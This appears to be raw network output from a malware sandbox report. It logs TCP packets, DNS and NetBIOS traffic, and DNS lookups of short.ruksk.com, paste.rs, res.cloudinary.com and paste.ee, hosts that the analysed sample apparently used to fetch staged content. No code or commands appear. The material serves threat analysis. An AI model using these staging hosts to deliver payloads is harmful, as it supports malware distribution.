                                                                                                                    Dec 11, 2024 10:54:40.201952934 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.201975107 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.209585905 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.209621906 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.209669113 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.209681988 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.209712029 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.216691017 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.216715097 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.216758013 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.216769934 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.216797113 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.219141960 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.224106073 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.224133015 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.224195957 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.224209070 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.226093054 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.231910944 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.231939077 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.231998920 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.232009888 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.238748074 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.238776922 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.238826990 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.238838911 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.238867044 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.243098021 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.262998104 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.263024092 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.263084888 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.263099909 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.263113022 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.267667055 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.267700911 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.267743111 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.267754078 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.267776012 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.288815975 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.391594887 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.391627073 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.391690016 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.391710043 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.391740084 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.391773939 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.398417950 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.398448944 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.398495913 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.398508072 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.398519039 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.406418085 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.406452894 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.406490088 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.406505108 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.406517982 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.413899899 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.413924932 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.413958073 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.413969994 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.413981915 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.413995981 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.421767950 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.421797037 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.421827078 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.421838045 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.421848059 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.428559065 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.428591967 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.428627968 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.428637981 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.428661108 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.428713083 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.435767889 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.435806036 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.435843945 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.435852051 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.435863018 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.436784029 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.459646940 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.459693909 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.459728956 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.459743023 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.459754944 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.462968111 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.583776951 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.583844900 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.583892107 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.583908081 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.583920956 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.586000919 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.591455936 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.591485977 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.591525078 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.591543913 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.591558933 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.596105099 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.598323107 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.598347902 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.598380089 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.598397970 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.598412037 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.605233908 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.605990887 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.606014013 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.606046915 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.606059074 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.606071949 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.613823891 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.613857031 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.613889933 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.613907099 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.613925934 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.614360094 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.620635033 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.620656967 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.620698929 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.620709896 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.620722055 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.623914957 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.645482063 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.645503998 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.645540953 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.645550966 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.645570040 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.651737928 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.651763916 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.651794910 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.651807070 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.651818037 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.653150082 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.790961981 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.790987968 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.791037083 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.791055918 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.791079998 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.797748089 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.797779083 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.797915936 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.797925949 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.797956944 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.805300951 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.805331945 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.805363894 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.805377007 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.805388927 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.808083057 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.813128948 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.813153982 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.813186884 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.813195944 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.813213110 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.817708969 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.819961071 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.819991112 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.820019960 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.820029974 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.820040941 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.826811075 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.828238964 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.828269005 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.828314066 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.828321934 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.828331947 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.837666988 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.837701082 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.837733984 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.837745905 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.837755919 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.839711905 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.843877077 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.843909979 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.843981981 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.843992949 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.846244097 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.982322931 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.982357025 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.982410908 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.982410908 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.982429981 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.982482910 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.990133047 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.990164042 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.990209103 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.990225077 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.990233898 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.990253925 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.996933937 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.996968031 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.997008085 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.997028112 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:40.997045994 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:40.997080088 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:41.001307964 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:41.001379967 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:41.001389980 CET44349174151.101.1.137192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:41.001436949 CET49174443192.168.2.22151.101.1.137
                                                                                                                    Dec 11, 2024 10:54:41.002016068 CET49174443192.168.2.22151.101.1.137
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 11, 2024 10:53:50.667850971 CET5456253192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:53:50.815658092 CET53545628.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:55.277439117 CET5291753192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:53:55.543966055 CET53529178.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:55.556965113 CET5291753192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:53:55.692612886 CET53529178.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:53:55.693011045 CET5291753192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:53:55.961877108 CET53529178.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:11.232335091 CET6275153192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:11.488360882 CET53627518.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:11.488737106 CET6275153192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:11.622334957 CET53627518.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:15.988558054 CET5789353192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:16.265769005 CET53578938.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:16.651098967 CET5482153192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:16.797605038 CET53548218.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:17.964927912 CET137137192.168.2.22192.168.2.255
                                                                                                                    Dec 11, 2024 10:54:17.997946024 CET5499853192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:18.266504049 CET53549988.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:18.301181078 CET5499853192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:18.435342073 CET53549988.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:18.435672045 CET5499853192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:18.569461107 CET53549988.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:18.569792032 CET5499853192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:18.704317093 CET53549988.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:18.704616070 CET5499853192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:18.726512909 CET137137192.168.2.22192.168.2.255
                                                                                                                    Dec 11, 2024 10:54:18.826812983 CET53549988.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:19.476489067 CET137137192.168.2.22192.168.2.255
                                                                                                                    Dec 11, 2024 10:54:30.152299881 CET5278153192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:30.516330957 CET53527818.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:30.516549110 CET5278153192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:30.771547079 CET53527818.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:35.282922029 CET6392653192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:35.416995049 CET53639268.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:35.419809103 CET6551053192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:35.630625963 CET53655108.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:36.953790903 CET6267253192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:37.202156067 CET53626728.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:37.202439070 CET6267253192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:37.335875988 CET53626728.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:37.336042881 CET6267253192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:37.575030088 CET53626728.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:37.575277090 CET6267253192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:37.708708048 CET53626728.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:37.708937883 CET6267253192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:37.842483044 CET53626728.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:37.843687057 CET137137192.168.2.22192.168.2.255
                                                                                                                    Dec 11, 2024 10:54:38.592605114 CET137137192.168.2.22192.168.2.255
                                                                                                                    Dec 11, 2024 10:54:39.356865883 CET137137192.168.2.22192.168.2.255
                                                                                                                    Dec 11, 2024 10:54:52.361164093 CET5647553192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:52.605168104 CET53564758.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:52.605361938 CET5647553192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:52.848691940 CET53564758.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:52.848865032 CET5647553192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:52.982636929 CET53564758.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:52.982806921 CET5647553192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:53.116955996 CET53564758.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:53.117124081 CET5647553192.168.2.228.8.8.8
                                                                                                                    Dec 11, 2024 10:54:53.239228010 CET53564758.8.8.8192.168.2.22
                                                                                                                    Dec 11, 2024 10:54:53.240041971 CET137137192.168.2.22192.168.2.255
                                                                                                                    Dec 11, 2024 10:54:53.989747047 CET137137192.168.2.22192.168.2.255
                                                                                                                    Dec 11, 2024 10:54:54.754169941 CET137137192.168.2.22192.168.2.255
                                                                                                                    Dec 11, 2024 10:55:15.022655010 CET138138192.168.2.22192.168.2.255
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Dec 11, 2024 10:53:50.667850971 CET192.168.2.228.8.8.80x7db7Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:53:55.277439117 CET192.168.2.228.8.8.80x92e4Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:53:55.556965113 CET192.168.2.228.8.8.80x92e4Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:53:55.693011045 CET192.168.2.228.8.8.80x92e4Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:11.232335091 CET192.168.2.228.8.8.80xf50Standard query (0)paste.rsA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:11.488737106 CET192.168.2.228.8.8.80xf50Standard query (0)paste.rsA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:15.988558054 CET192.168.2.228.8.8.80x3a79Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:16.651098967 CET192.168.2.228.8.8.80xec8fStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:17.997946024 CET192.168.2.228.8.8.80x1a99Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:18.301181078 CET192.168.2.228.8.8.80x1a99Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:18.435672045 CET192.168.2.228.8.8.80x1a99Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:18.569792032 CET192.168.2.228.8.8.80x1a99Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:18.704616070 CET192.168.2.228.8.8.80x1a99Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:30.152299881 CET192.168.2.228.8.8.80x2b4aStandard query (0)paste.rsA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:30.516549110 CET192.168.2.228.8.8.80x2b4aStandard query (0)paste.rsA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:35.282922029 CET192.168.2.228.8.8.80x91dcStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:35.419809103 CET192.168.2.228.8.8.80xdb92Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:36.953790903 CET192.168.2.228.8.8.80x26c4Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:37.202439070 CET192.168.2.228.8.8.80x26c4Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:37.336042881 CET192.168.2.228.8.8.80x26c4Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:37.575277090 CET192.168.2.228.8.8.80x26c4Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:37.708937883 CET192.168.2.228.8.8.80x26c4Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:52.361164093 CET192.168.2.228.8.8.80x1aedStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:52.605361938 CET192.168.2.228.8.8.80x1aedStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:52.848865032 CET192.168.2.228.8.8.80x1aedStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:52.982806921 CET192.168.2.228.8.8.80x1aedStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:53.117124081 CET192.168.2.228.8.8.80x1aedStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Dec 11, 2024 10:53:50.815658092 CET8.8.8.8192.168.2.220x7db7No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:53:55.543966055 CET8.8.8.8192.168.2.220x92e4No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:53:55.692612886 CET8.8.8.8192.168.2.220x92e4No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:53:55.961877108 CET8.8.8.8192.168.2.220x92e4No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
